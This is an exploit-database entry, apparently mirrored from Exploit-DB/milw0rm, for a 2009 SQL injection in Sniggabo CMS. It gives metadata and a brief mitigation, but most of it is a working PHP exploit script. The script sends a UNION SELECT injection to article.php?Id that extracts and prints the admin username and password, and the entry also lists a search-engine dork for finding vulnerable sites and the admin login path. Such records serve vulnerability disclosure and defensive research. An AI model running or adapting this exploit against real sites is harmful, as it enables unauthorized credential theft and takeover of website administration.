Sniggabo CMS - Remote SQL Injection Exploit

vendor:

Sniggabo CMS

by:

Lidloses_Auge

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Sniggabo CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sniggabo CMS – Remote SQL Injection Exploit

This exploit allows an attacker to gain access to the admin panel of a vulnerable Sniggabo CMS website. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable website, which contains malicious SQL code. The malicious code is then executed by the vulnerable website, allowing the attacker to gain access to the admin panel.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

<?php
print_r('

################################################

Sniggabo CMS - Remote SQL Injection Exploit

Date:				11.06.2009
Vulnerability discovered by:	Lidloses_Auge
Exploit coded by:		Lidloses_Auge
Homepage:		    	http://www.novusec.com
Greetz to:			-=Player=- , Suicide, enco,
				Palme, GPM, karamble, Free-Hack

Admin Panel: 			[target]/admin/login.php
Dork:				"powered by Sniggabo CMS" inurl:article.php?id
Use:				php '.$argv[0].' http://www.site.com

################################################

');
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>

# milw0rm.com [2009-06-11]